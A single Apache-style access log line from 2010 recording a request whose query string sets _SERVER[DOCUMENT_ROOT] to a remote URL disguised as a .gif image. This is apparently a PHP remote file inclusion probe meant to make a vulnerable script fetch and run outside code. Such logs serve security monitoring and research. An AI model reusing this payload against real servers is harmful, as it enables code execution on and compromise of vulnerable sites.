210.127.209.105 - - [24/Feb/2010:06:26:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
